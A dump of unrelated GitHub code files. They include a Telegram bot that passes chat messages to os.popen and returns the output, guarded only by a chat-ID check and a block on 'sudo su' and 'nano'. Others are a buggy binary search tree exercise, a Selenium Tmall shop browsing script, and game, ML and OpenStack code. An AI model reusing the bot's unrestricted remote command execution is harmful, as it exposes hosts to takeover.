and command != \"sudo su\" and \"nano\" not in command:\n try:\n message = os.popen(command).read()\n bot.sendMessage(chat_id, message)\n except:\n bot.sendMessage(chat_id, \"comando non valido\")\n else:\n print(\"Messaggio sbagliato\")\n bot.sendMessage(chat_id, \"Comando non recepito\")\n else:\n bot.sendMessage(\n chat_id, 'Non sei autorizzate a darmi ordini! Il tuo codice chat è: ' + sender)\n\n\nprint(\"Bot Token: \" + botToken)\nbot = telepot.Bot(botToken)\nbot.message_loop(handle)\n\nprint('I am listening ...')\n\nwhile 1:\n time.sleep(10000)\n","repo_name":"fedegovoni/alarm","sub_path":"zm_server/bot_telegram.py","file_name":"bot_telegram.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16588526322","text":"class TreeNode():\n def __init__(self):\n self.left = None\n self.data = None\n self.right = None\n\nmemory = []\nroot = None\nnameAry = ['Haruhi', 'Yuki', 'Kyon', 'Mikuru', 'Koizumi']\n\nnode = TreeNode()\nnode.data = nameAry[0]\nroot = node\nmemory.append(node)\n\nfor name in nameAry[1:]:\n node = TreeNode()\n node.data = name\n\n current = root\n while True:\n if name < current.data :\n if current.left == None:\n current.left = node\n break\n else:\n current = current.left\n else:\n if current.right == None:\n current.right = node\n break\n else:\n current = current.right\n\n memory. append(node)\n\nprint(\"이진 탐색 트리 완료\")\n\nfindName= 'Kyona'\n\ncurrent = root\nwhile True:\n if (findName == current.data):\n print(findName, '는 SOS단 멤버')\n break\n elif (findName < current.data):\n if (current.left == None):\n print('그런 인물은 없다')\n current = current.left\n else:\n if (current.right == None):\n print('그런 인물은 없다')\n current = current.right","repo_name":"junhokim42/Python_study","sub_path":"Bigdata_training/Python_class/day13/Code_10.py","file_name":"Code_10.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"20972747640","text":"from enum import Enum\nfrom weather import WeatherServices\nimport os\nimport json\n\nclass Units(str, Enum):\n IMPERIAL: str = \"imperial\"\n METRIC: str = \"metric\"\n SCIENTIFIC: str = \"scientific\"\n\nclass UnitsConversion():\n @staticmethod\n def ConvertTemp(base_unit, temp, target_unit):\n if base_unit == Units.IMPERIAL:\n if target_unit == Units.METRIC:\n return (temp-32) * (5.0/9.0)\n if target_unit == Units.SCIENTIFIC:\n return (temp - 32) * (5.0 / 9.0) + 273.15\n if base_unit == Units.METRIC:\n if target_unit == Units.IMPERIAL:\n return (temp * 9.0/5.0) + 32\n if target_unit == Units.SCIENTIFIC:\n return temp + 273.15\n if base_unit == Units.SCIENTIFIC:\n if target_unit == Units.IMPERIAL:\n return (temp - 273.15) * (9.0/5.0) + 32\n if target_unit == Units.METRIC:\n return temp - 273.15\n return temp\n\nclass Settings():\n def __init__(self, settings_path):\n self.temperature_units = Units.METRIC\n self.temperature_variance = 2\n self.temperature_target = 23.0\n self.refresh_interval_ms = 5000\n self.weather_service = WeatherServices.WEATHER_DOT_GOV\n self.lat = 39.7456\n self.lon = -97.0892\n self._settings_path = settings_path\n\n def load(self):\n if not os.path.exists(self._settings_path):\n self.save()\n\n with open(self._settings_path, \"r\") as settings_file:\n settings_dict = json.load(settings_file)\n self.update_from_dict(settings_dict)\n\n def save(self):\n directory_path = os.path.dirname(self._settings_path)\n if not os.path.exists(directory_path):\n os.makedirs(directory_path)\n\n settings_dict = self.to_dict()\n with open(self._settings_path, \"w+\") as settings_file:\n json.dump(settings_dict, settings_file, indent=6)\n\n def to_dict(self):\n settings_dict = {\n \"temperature_units\": self.temperature_units,\n \"temperature_variance\": self.temperature_variance,\n \"temperature_target\": self.temperature_target,\n \"refresh_interval_ms\": self.refresh_interval_ms,\n \"weather_service\": self.weather_service,\n \"lat\": self.lat,\n \"lon\": self.lon\n }\n return settings_dict\n\n def update_from_dict(self, settings_dict):\n self.temperature_units = settings_dict[\"temperature_units\"]\n self.temperature_variance = settings_dict[\"temperature_variance\"]\n self.temperature_target = settings_dict[\"temperature_target\"]\n self.refresh_interval_ms = settings_dict[\"refresh_interval_ms\"]\n self.weather_service = settings_dict[\"weather_service\"]\n self.lat = settings_dict[\"lat\"]\n self.lon = settings_dict[\"lon\"]\n\nclass SettingsFactory():\n @staticmethod\n def create_settings(path):\n settings = Settings(path)\n settings.load()\n return settings\n","repo_name":"FormerLurker/heat_battery","sub_path":"heat_battery/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31549076992","text":"import setuptools\n\nwith open('tensorfx/_version.py') as vf:\n exec(vf.read())\n\nwith open('requirements.txt') as rf:\n dependencies = rf.readlines()\n dependencies = map(lambda d: d.strip(), dependencies)\n dependencies = filter(lambda d: d and not d.startswith('#'), dependencies)\n\nsetuptools.setup(\n name='tensorfx',\n version=__version__,\n packages=[\n 'tensorfx',\n 'tensorfx.data',\n 'tensorfx.training',\n 'tensorfx.prediction',\n 'tensorfx.tools',\n 'tensorfx.models',\n 'tensorfx.models.nn'\n ],\n entry_points={\n 'console_scripts': [\n 'tfx = tensorfx.tools.tfx:main'\n ],\n },\n data_files=[('.', ['requirements.txt'])],\n install_requires=dependencies,\n author='Nikhil Kothari',\n author_email='nikhilk@twitter',\n url='https://github.com/TensorLab/tensorfx',\n license=\"Apache Software License\",\n description='TensorFX Framework for training and serving machine learning models with TensorFlow',\n keywords=[\n 'TensorLab',\n 'TensorFlow',\n 'Machine Learning',\n 'Deep Learning',\n 'Google'\n ],\n classifiers=[\n # https://pypi.python.org/pypi?%3Aaction=list_classifiers\n 'Development Status :: 3 - Alpha',\n 'Environment :: Other Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License'\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Operating System :: OS Independent',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n)\n","repo_name":"TensorLab/tensorfx","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"48"} +{"seq_id":"18457333","text":"\"\"\"\r\ndurak env for rlcard env\r\n\"\"\"\r\nfrom base64 import decode\r\nfrom matplotlib.pyplot import table\r\nimport numpy as np\r\nfrom collections import OrderedDict, Counter\r\n\r\nfrom rlcard.envs import Env\r\nfrom game import Game\r\nfrom base.durak2 import Card\r\n\r\nfrom functools import lru_cache\r\n\r\nimport os\r\nimport sys\r\nif \"PROJECT_PATH\" in os.environ:\r\n # if not supporting virtualenv\r\n sys.path.insert(0,os.environ['PROJECT_PATH'])\r\n\r\nDEFAULT_GAME_CONFIG = {\r\n 'game_num_players': 2,\r\n 'game_num_decks': 1,\r\n 'allow_step_back': False,\r\n 'seed': 1\r\n }\r\nTOTAL_CARDS = 36\r\n\r\nclass DurakEnv(Env):\r\n ''' DurakEnv Environment\r\n '''\r\n\r\n def __init__(self, config=DEFAULT_GAME_CONFIG):\r\n ''' Initialize the durak environment\r\n '''\r\n\r\n self.name = 'durak'\r\n self.game = Game()\r\n super().__init__(config)\r\n # TODO recalc state shape\r\n self.state_shape = [[229], [229]]\r\n\r\n # add special action\r\n self.action_shape = [[TOTAL_CARDS+1] for _ in range(self.num_players)]\r\n\r\n def _get_legal_actions(self):\r\n ''' Get all legal actions for current state\r\n Returns:\r\n legal_actions (list): a list of legal actions' id\r\n '''\r\n legal_actions = self.game.state['actions']\r\n \r\n legal_actions = dict([ (compute_action_id(action), _one_hot(action) ) for action in legal_actions])\r\n #print(legal_actions)\r\n return legal_actions\r\n\r\n def _decode_action(self,action_id):\r\n ''' Action id -> the action in the game. Must be implemented in the child class.\r\n Args:\r\n action_id (int): the id of the action\r\n Returns:\r\n action (string): the action that will be passed to the game engine.\r\n '''\r\n return decode_action(action_id)\r\n \r\n\r\n def _extract_state(self, state):\r\n ''' Encode state\r\n Args:\r\n state (dict): dict of original state\r\n '''\r\n current_hand = _cards2array(state['hand'])\r\n others_hand = _cards2array(state['knownOpponentHand'])\r\n isAttacker = state['isAttacker']\r\n unseenCards = _cards2array(state['unseen'])\r\n table = _cards2array(state['table'])\r\n deckSize = state['deckSize']\r\n opponentHandSize = state['opponentHandSize']\r\n trumpSuit = _one_hot_index(state['trumpSuit'],4)\r\n trash = _cards2array(state['trash'])\r\n unseen = _cards2array(state['unseen'])\r\n\r\n obs = np.concatenate((current_hand,\r\n others_hand,\r\n [isAttacker],\r\n unseenCards,\r\n table,\r\n [deckSize],\r\n [opponentHandSize],\r\n trumpSuit,\r\n trash,\r\n unseen\r\n ))\r\n\r\n extracted_state = OrderedDict({'obs': obs, 'legal_actions': self._get_legal_actions()})\r\n extracted_state['raw_obs'] = state\r\n extracted_state['raw_legal_actions'] = [a for a in state['actions']]\r\n extracted_state['action_record'] = self.action_recorder\r\n return extracted_state\r\n \r\n def get_payoffs(self):\r\n ''' Get the payoffs of players. Must be implemented in the child class.\r\n Returns:\r\n payoffs (list): a list of payoffs for each player\r\n '''\r\n if self.game.winner_id is None:\r\n # should not happen\r\n return (0,0)\r\n payoffs = [0,0]\r\n payoffs[self.game.winner_id]=1\r\n return tuple(payoffs)\r\n \r\n\r\n def get_perfect_information(self):\r\n ''' Get the perfect information of the current state\r\n Returns:\r\n (dict): A dictionary of all the perfect information of the current state\r\n '''\r\n state = {}\r\n #state['hand_cards_with_suit'] = [self._cards2str_with_suit(player.current_hand) for player in self.game.players]\r\n state['hand_cards'] = [self.game.get_hand(0),self.game.get_hand(1)]\r\n # trace is table\r\n state['table'] = self.game.state['table']\r\n state['current_player'] = self.game.get_current_player()\r\n state['legal_actions'] = self.game.state['actions']\r\n return state\r\n\r\n def get_action_feature(self, action):\r\n ''' For some environments such as DouDizhu, we can have action features\r\n Returns:\r\n (numpy.array): The action features\r\n '''\r\n return _one_hot( decode_action(action) )\r\n\r\nCard2Column = {'3': 0, '4': 1, '5': 2, '6': 3, '7': 4, '8': 5, '9': 6, 'T': 7,\r\n 'J': 8, 'Q': 9, 'K': 10, 'A': 11, '2': 12}\r\n\r\nNumOnes2Array = {0: np.array([0, 0, 0, 0]),\r\n 1: np.array([1, 0, 0, 0]),\r\n 2: np.array([1, 1, 0, 0]),\r\n 3: np.array([1, 1, 1, 0]),\r\n 4: np.array([1, 1, 1, 1])}\r\n\r\n@lru_cache(maxsize=128)\r\ndef compute_action_id(action):\r\n if action.suit==-1:\r\n return 36\r\n action_id = action.suit*9+action.rank-6\r\n #print(action, action_id)\r\n return action_id\r\n\r\n@lru_cache(maxsize=128)\r\ndef decode_action(action_id):\r\n ''' Action id -> the action in the game. Must be implemented in the child class.\r\n Args:\r\n action_id (int): the id of the action\r\n Returns:\r\n action (string): the action that will be passed to the game engine.\r\n '''\r\n if (action_id==36):\r\n return Card(-1,-1)\r\n suit=action_id//9\r\n rank=action_id%9+6\r\n card = Card(suit,rank)\r\n return card\r\n\r\n@lru_cache(maxsize=128)\r\ndef _one_hot(card):\r\n # gets one card, returns one hot\r\n base = np.zeros((4,9), dtype=np.int8)\r\n has_special=[0]\r\n if card.suit == -1: # special card:\r\n has_special=[1]\r\n return np.concatenate([base.flatten('F'),has_special])\r\n base[card.suit][card.rank-6] = 1\r\n return np.concatenate([base.flatten('F'),has_special])\r\n\r\n@lru_cache(maxsize=128)\r\ndef _cards2array(cards):\r\n base = np.zeros((4,9), dtype=np.int8)\r\n has_special=[0]\r\n for card in cards:\r\n if (card.suit == -1):\r\n has_special=[1]\r\n else:\r\n base[card.suit][card.rank-6] = 1\r\n return np.concatenate([base.flatten('F'),has_special])\r\n\r\n\r\ndef _one_hot_index(index,max_vals):\r\n one_hot = np.zeros(max_vals,int)\r\n one_hot[index]=1\r\n return one_hot\r\n","repo_name":"maxmarsakov/durak-project","sub_path":"durak_rlcard/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41836239615","text":"from minium import ddt_class, ddt_case\nfrom base.test_base import TestBase\n@ddt_class()\nclass Testesfdetail(TestBase):\n \"\"\"\n 二手房详情页\n \"\"\"\n def setUp(self, true=None) -> None:\n # self.page_name = \"/esf/sell/pages/detail/detail?sellId=331233705\"\n self.page_name = \"/esf/sell/pages/detail/detail?sellId=344383365\"\n self.switch = true\n self.classname = self.__class__.__name__\n super(Testesfdetail, self).setUp()\n print(\"Testesfdetail setup\")\n\n def test_26_点击日照图(self):\n \"\"\"\n V6.39.X: 点击小区楼栋模块gif图\n \"\"\"\n self.find_element('view[class=\"pr sunlight\"]').tap()\n\n self.get_screenshot()\n self.verifyPageName('/page/newhouse/rizhaofenxi/rizhaofenxi')\n\n def test_27_日照IM(self):\n \"\"\"\n V6.39.X: 点击咨询楼栋详情\n \"\"\"\n self.find_element('view[class=\"center chat\"]').tap()\n\n self.delay(3)\n self.get_screenshot()\n\n def test_36_goto_photo_点击相册(self):\n \"\"\"\n 点击相册\n \"\"\"\n elms = self.page.get_element('view[id=\"banner\"]').get_element('banner').get_elements('view')\n elms[0].get_element('swiper').get_element('swiper-item').tap()\n self.delay(1)\n self.get_screenshot()\n\n def test_01_goto_fxk_点击放心看(self):\n \"\"\"\n 点击放心看\n :return:\n \"\"\"\n fxk = self.page.element_is_exists('view[class=\"pr between fangXinKan\"]')\n if fxk == True:\n e = self.page.get_element('view[class=\"pr between fangXinKan\"]')\n e.tap()\n self.delay(2)\n self.get_screenshot()\n else:\n print('没有放心看标签')\n\n def test_02_goto_collect_点击取消收藏(self):\n \"\"\"\n 点击收藏\n :return:\n \"\"\"\n e = self.find_element('view[class=\"pa center collect\"]')\n e.tap()\n self.get_screenshot()\n \"\"\"\n 取消收藏\n \"\"\"\n e1 = self.find_element('view[class=\"pa center collect\"]')\n e1.tap()\n self.get_screenshot()\n\n def delete_test_27_goto_share_点击分享(self):\n \"\"\"\n 点击分享\n :return:\n \"\"\"\n e = self.page.get_element('button[class=\"button\"]')\n e.tap()\n self.delay(5)\n #self.get_capture()\n self.get_screenshot()\n\n def test_03_goto_ckxq_点击查看详情(self):\n \"\"\"\n 点击查看详情\n :return:\n \"\"\"\n e = self.find_element('view[class=\"center check\"]')\n e.tap()\n self.get_screenshot()\n\n def test_04_goto_ygim_首付和月供咨询(self):\n \"\"\"\n 点击首付和月供咨询\n :return:\n \"\"\"\n e = self.page.get_element('text', inner_text=\"首付和月供咨询\")\n e.tap()\n self.get_screenshot()\n\n def test_05_goto_lcim_点击楼层咨询(self):\n \"\"\"\n 点击楼层咨询\n :return:\n \"\"\"\n e = self.page.get_element('text', inner_text=\"楼层咨询\")\n e.tap()\n self.get_screenshot()\n\n def test_06_goto_sfim_点击税费咨询(self):\n \"\"\"\n 点击税费咨询\n :return:\n \"\"\"\n e = self.page.get_element('text', inner_text=\"税费咨询\")\n e.tap()\n self.delay(3)\n self.get_screenshot()\n\n def test_07_goto_qcj_点击去出价(self):\n \"\"\"\n 点击去出价\n :return:\n \"\"\"\n e = self.find_element('view[class=\"pa bidBtn\"]')\n e.tap()\n self.delay(3)\n self.get_screenshot()\n\n def test_08_goto_xqzx_房源详情咨询(self):\n \"\"\"\n 点击咨询房源详情\n :return:\n \"\"\"\n e = self.find_element('view[class=\"center chat\"]/text', inner_text=\"咨询房源详情\")\n e.tap()\n self.get_screenshot()\n\n def test_09_goto_ckall_房源描述查看详情(self):\n \"\"\"\n 房源描述-查看详情\n :return:\n \"\"\"\n des = self.page.element_is_exists('text', inner_text='房源描述')\n if des == True:\n tog = self.page.element_is_exists('text', inner_text='查看全部')\n if tog == True:\n self.page.get_element('text', inner_text='查看全部').tap()\n self.delay(3)\n self.get_screenshot()\n self.delay(3)\n self.page.get_element('text', inner_text='收起').tap()\n self.delay(3)\n self.get_screenshot()\n self.delay(3)\n else:\n print('没有查看更多')\n else:\n print('没有房源描述模块')\n\n @ddt_case(\n 1, 2, 3, 4\n )\n def test_10_goto_rmim_点击热门咨询tab(self, value):\n \"\"\"\n 热门咨询(小区有停车位吗?,小区楼间距如何?,价格可以再优惠吗?,房子满五唯一吗?)\n :param value:\n :return:\n \"\"\"\n align_msg = self.page.get_elements('view[class=\"flex a_c msg\"]')\n msg_list = align_msg[value]\n msg_list.tap()\n self.delay(2)\n self.get_screenshot()\n\n def test_11_goto_xqckxq_小区查看详情(self):\n \"\"\"\n 点击小区-查看详情\n :return:\n \"\"\"\n e = self.find_element('view[class=\"flex a_c checkMore\"]/text', inner_text='查看详情')\n e.tap()\n self.delay(5)\n self.get_screenshot()\n\n def test_12_goto_xqxq_点击小区进入详情页(self):\n \"\"\"\n 点击小区,进入小区详情页\n :return:\n \"\"\"\n e = self.find_element('view[class=\"pr villageImg\"]')\n e.tap()\n self.delay(5)\n self.get_screenshot()\n\n def test_13_goto_cjmsg_咨询近期成交数据(self):\n \"\"\"\n 点击咨询近期成交数据\n :return:\n \"\"\"\n e = self.page.get_element('text', inner_text=\"咨询近期成交数据\")\n e.tap()\n self.get_screenshot()\n\n def test_14_goto_fjpg_点击房价评估(self):\n \"\"\"\n 点击房价评估\n :return:\n \"\"\"\n e = self.page.get_element('text', inner_text=\"房价评估\")\n e.tap()\n self.get_screenshot()\n\n def test_15_goto_fjzs_点击房价走势图(self):\n \"\"\"\n 点击房价走势图\n :return:\n \"\"\"\n e = self.page.get_element('view[class=\"trendCharts\"]')\n e.tap()\n self.delay(3)\n self.get_screenshot()\n\n def test_16_goto_txqfy_点击同小区房源详情页(self):\n \"\"\"\n 点击同小区房源,进入房源详情页\n :return:\n \"\"\"\n # 页面滚动到同小区房源区域\n self.page.scroll_to(1400, 500)\n self.delay(1)\n\n # 先获取所有item\n elm_items = self.page.get_elements('//view[@id=\"anchor_4\"]/view[@class=\"list\"]/view[@class=\"item\"]')\n\n if len(elm_items) == 0:\n print(\"没有同小区房源\")\n else:\n # 第一个item\n elm_first_item = elm_items[0]\n # 点击第一条房源\n elms = elm_first_item.get_element('sell_item').get_elements('view')\n elms[0].tap()\n self.get_screenshot()\n\n def test_17_click_prmap_点击周边配套(self):\n \"\"\"\n 点击周边配套\n :return:\n \"\"\"\n self.page.scroll_to(1550, 500)\n self.delay(1)\n try:\n self.page.get_element('map[class=\"map\"]').tap()\n self.delay(3)\n except:\n print('没有周边配套模块')\n\n self.get_screenshot()\n\n def test_18_goto_txq_全部同小区房源(self):\n \"\"\"\n 点击全部同小区房源\n :return:\n \"\"\"\n e = self.page.get_element('view[class=\"center moreHouses\"][data-type=\"2\"]')\n e.tap()\n self.delay(3)\n self.get_screenshot()\n\n def test_19_goto_cnxh_猜你喜欢进入房源详情页(self):\n \"\"\"\n 猜你喜欢,进入房源详情页\n :return:\n \"\"\"\n # 页面滚动到猜你喜欢区域\n self.page.scroll_to(1750, 500)\n self.delay(1)\n\n # 先获取所有item\n elm_items = self.page.get_elements('//view[@class=\"guessLike\"]/view[@class=\"list\"]/view[@class=\"item\"]')\n\n if len(elm_items) == 0:\n print(\"没有猜你喜欢房源\")\n else:\n # 第一个item\n elm_first_item = elm_items[0]\n # 点击第一条房源\n elms = elm_first_item.get_element('sell_item').get_elements('view')\n elms[0].tap()\n self.delay(3)\n self.get_screenshot()\n\n def test_20_goto_moreesf_点击更多二手房(self):\n \"\"\"\n 点击更多二手房\n :return:\n \"\"\"\n e = self.page.get_element('view[class=\"center moreHouses\"][data-type=\"2\"]')\n e.tap()\n self.delay(3)\n self.get_screenshot()\n\n def delete_test_21_goto_report_点击我要举报(self):\n \"\"\"\n 点击我要举报\n :return:\n \"\"\"\n self.page.scroll_to(1900, 500)\n self.delay(1)\n e = self.page.get_element('view[class=\"flex j_e report\"]')\n e.tap()\n self.get_screenshot()\n\n @ddt_case(\n 1, 2, 3, 4\n )\n def test_22_goto_asklayer_点击提问弹层及tab(self, value=3):\n \"\"\"\n 提问弹层()\n :param value:\n :return:\n \"\"\"\n self.find_element('view[class=\"questionCst--arrow questionCst--arrowUp\"]').tap()\n self.delay(1)\n self.find_element(f'//*[@id=\"questionCst\"]//view/view[1]/view[{value}]/view[1]').tap()\n self.delay(2)\n self.get_screenshot()\n\n def test_23_goto_broker_点击经纪人(self):\n \"\"\"\n 点击经纪人\n :return:\n \"\"\"\n # xpath定位\n elm = self.page.get_element('//view[@class=\"pf contact\"]/contact/view/view/view[1]')\n elm.tap()\n self.delay(5)\n self.get_screenshot()\n\n def test_24_goto_zxmsg_点击在线咨询(self):\n \"\"\"\n 点击在线咨询\n :return:\n \"\"\"\n # xpath定位\n elm = self.page.get_element('//view[@class=\"pf contact\"]/contact/view/view/view[2]/view[1]')\n elm.tap()\n self.delay(2)\n self.get_screenshot()\n\n def test_25_goto_tel_点击拨打电话(self):\n \"\"\"\n 点击拨打电话\n :return:\n \"\"\"\n # xpath定位\n elm = self.page.get_element('//view[@class=\"pf contact\"]/contact/view/view/view[2]/view[2]')\n elm.tap()\n self.get_screenshot()\n\n","repo_name":"gzsyr/tfminium","sub_path":"esf/test_esf_detail_二手房详情.py","file_name":"test_esf_detail_二手房详情.py","file_ext":"py","file_size_in_byte":10636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28564799127","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom os_brick.initiator import connector\nfrom oslo_config import cfg\n\nfrom nova import utils\nfrom nova.virt.libvirt.volume import iscsi\n\nvolume_opts = [\n cfg.IntOpt('num_iser_scan_tries',\n default=5,\n help='Number of times to rescan iSER target to find volume'),\n cfg.BoolOpt('iser_use_multipath',\n default=False,\n help='Use multipath connection of the iSER volume'),\n ]\n\nCONF = cfg.CONF\nCONF.register_opts(volume_opts, 'libvirt')\n\n\nclass LibvirtISERVolumeDriver(iscsi.LibvirtISCSIVolumeDriver):\n \"\"\"Driver to attach Network volumes to libvirt.\"\"\"\n def __init__(self, connection):\n super(LibvirtISERVolumeDriver, self).__init__(connection)\n\n # Call the factory here so we can support\n # more than x86 architectures.\n self.connector = connector.InitiatorConnector.factory(\n 'ISER', utils.get_root_helper(),\n use_multipath=CONF.libvirt.iser_use_multipath,\n device_scan_attempts=CONF.libvirt.num_iser_scan_tries,\n transport=self._get_transport())\n\n def _get_transport(self):\n return 'iser'\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/virt/libvirt/volume/iser.py","file_name":"iser.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"74556401106","text":"from uiautomation.pages.basepage import BasePage\nfrom uiautomation.common import Constants\nfrom uiautomation.elements import BasePageElement\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0\nfrom selenium.webdriver.support import expected_conditions as EC # available since 2.26.0\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\nclass Locators(object):\n dictionary = {\n # \"\"\"tmall shop page elements\"\"\"\n \"body\":(By.CSS_SELECTOR,\"html > body\"),\n \"search_bar\":(By.CSS_SELECTOR,\"#mq\"),\n \"search_all\":(By.CSS_SELECTOR,\"#J_SearchBtn\"),\n \"search_shop\":(By.CSS_SELECTOR,\"#J_CurrShopBtn\"),\n \"top1_product\":(By.CSS_SELECTOR,\"#J_ShopSearchResult > div > div.J_TItems > div:nth-child(1) > dl:nth-child(1)\"), \n \"top2_product\":(By.CSS_SELECTOR,\"#J_ShopSearchResult > div > div.J_TItems > div:nth-child(1) > dl:nth-child(2)\"), \n \"top3_product\":(By.CSS_SELECTOR,\"#J_ShopSearchResult > div > div.J_TItems > div:nth-child(1) > dl:nth-child(3)\"),\n \"next_page\":(By.CSS_SELECTOR,\"#J_ShopSearchResult > div > div.J_TItems > div.pagination > a.J_SearchAsync.next\"),\n \"popup_login_username\":(By.XPATH,\"//*[@id=\\\"TPL_username_1\\\"]\"),\n \"popup_login_password\":(By.XPATH,\"//*[@id=\\\"TPL_password_1\\\"]\"),\n \"popup_login_frame\":(By.CSS_SELECTOR, \"#J_sufei > iframe\"),\n \"popup_login_submit\":(By.CSS_SELECTOR, \"#J_SubmitStatic\")\n \n }\n\nclass BodyElement(BasePageElement):\n locator = Locators.dictionary[\"body\"]\nclass SearchBarElement(BasePageElement):\n locator = Locators.dictionary[\"search_bar\"]\nclass PopupLoginFrameElement(BasePageElement):\n locator = Locators.dictionary[\"popup_login_frame\"]\nclass PopupLoginSubmitElement(BasePageElement):\n locator = Locators.dictionary[\"popup_login_submit\"]\nclass PopupLoginUNElement(BasePageElement):\n locator = Locators.dictionary[\"popup_login_username\"]\nclass PopupLoginPWDElement(BasePageElement):\n locator = Locators.dictionary[\"popup_login_password\"]\nclass SearchAllElement(BasePageElement):\n locator = Locators.dictionary[\"search_all\"]\nclass SearchShopElement(BasePageElement):\n locator = Locators.dictionary[\"search_shop\"]\nclass NextPageElement(BasePageElement):\n locator = Locators.dictionary[\"next_page\"]\nclass Top1ProductElement(BasePageElement):\n locator = Locators.dictionary[\"top1_product\"]\nclass Top2ProductElement(BasePageElement):\n locator = Locators.dictionary[\"top2_product\"]\nclass Top3ProductElement(BasePageElement):\n locator = Locators.dictionary[\"top3_product\"]\n\nclass ShopPage(BasePage):\n search_bar_element = SearchBarElement()\n search_all_element = SearchAllElement()\n search_shop_element = SearchShopElement()\n top1_product_element = Top1ProductElement()\n top2_product_element = Top2ProductElement()\n top3_product_element = Top3ProductElement()\n next_page_element = NextPageElement()\n\n def search(self, keywords):\n WebDriverWait(self.driver, Constants.WAIT_TIME_SHORT).until(EC.visibility_of_any_elements_located(Locators.dictionary[\"body\"]))\n \n self._scrollDownAndUp()\n \"\"\"entering search keywords\"\"\"\n _search_bar = self.search_bar_element\n _keywords_chain_actions = ActionChains(self.driver)\n _keywords_chain_actions.move_to_element(_search_bar)\n _keywords_chain_actions.click(_search_bar)\n for c in list(keywords):\n _keywords_chain_actions.send_keys(c)\n _keywords_chain_actions.perform()\n\n \"\"\"click search button\"\"\"\n self.driver.element = self.search_shop_element\n self.driver.element.click() \n WebDriverWait(self.driver, Constants.WAIT_TIME_SHORT).until(EC.visibility_of_any_elements_located(Locators.dictionary[\"body\"]))\n self._scrollDownAndUp()\n return True\n\n def viewTop3Products(self):\n _top1_product = self.top1_product_element\n _top1_product_actions = ActionChains(self.driver)\n _top1_product_actions.move_to_element(_top1_product).key_down(Keys.CONTROL).click().key_up(Keys.CONTROL).perform()\n self._viewNewTabAndCloseAfter()\n\n _top2_product = self.top2_product_element\n _top2_product_actions = ActionChains(self.driver)\n _top2_product_actions.move_to_element(_top2_product).key_down(Keys.CONTROL).click().key_up(Keys.CONTROL).perform()\n self._viewNewTabAndCloseAfter()\n\n _tope3_product = self.top3_product_element\n _tope3_product_actions = ActionChains(self.driver)\n _tope3_product_actions.move_to_element(_tope3_product).key_down(Keys.CONTROL).click().key_up(Keys.CONTROL).perform()\n self._viewNewTabAndCloseAfter()\n return True\n\n def viewTopPages(self, number_of_pages):\n for i in range(number_of_pages):\n print(\"viewing page: \" + str(i+1))\n self.viewTop3Products()\n if i+1 == number_of_pages:\n continue\n self.driver.element = self.next_page_element \n self.driver.element.click()\n self.driver.switch_to_default_content() \n return True\n\n def _viewNewTabAndCloseAfter(self): \n self.driver.switch_to_window(self.driver.window_handles[-1])\n self._scrollDownAndUp()\n self.driver.close()\n self.driver.switch_to_window(self.driver.window_handles[-1])\n self.driver.switch_to_default_content()\n\n def _scrollDownAndUp(self):\n _scroll_step = Constants.SCROLL_STEP \n _scroll_interval = Constants.SCROLL_INTERVAL\n \"\"\"scroll down\"\"\" \n _last_height = self.driver.execute_script(\"return document.body.scrollHeight\")\n for h in range(int(_last_height/_scroll_step)):\n time.sleep(_scroll_interval)\n self.driver.execute_script(\"window.scrollTo(0,\" + str(_scroll_step*(h+1)) + \");\")\n \"\"\"scroll up\"\"\" \n _last_height = self.driver.execute_script(\"return document.body.scrollHeight\")\n for h in range(int(_last_height/_scroll_step)):\n time.sleep(_scroll_interval)\n self.driver.execute_script(\"window.scrollTo(0,\" + str(_last_height - _scroll_step*(h+1)) + \");\")\n self.driver.execute_script(\"window.scrollTo(0, 0);\")\n","repo_name":"fingerella2000/e2enuggets","sub_path":"uiautomation/pages/shoppage.py","file_name":"shoppage.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33092763077","text":"import os\nimport argparse\nfrom typing import Dict, List\nimport csv\nimport json\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom improved_precision_recall import ManifoldEstimator, get_precision_and_recall, Manifold, PrecisionRecall\nfrom utilities import extract_from_filename, glob_filepaths\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('real_dir', type=str, help='Real features directory (load all npz files inside)')\n parser.add_argument('fake_dir', type=str, help='Fake features directory (load all npz files inside)')\n parser.add_argument('out_path', type=str, help='Path to output csv file')\n parser.add_argument('--recursive', '-r', action='store_true', help='Load features recursively from given directory')\n parser.add_argument('-k', type=int, 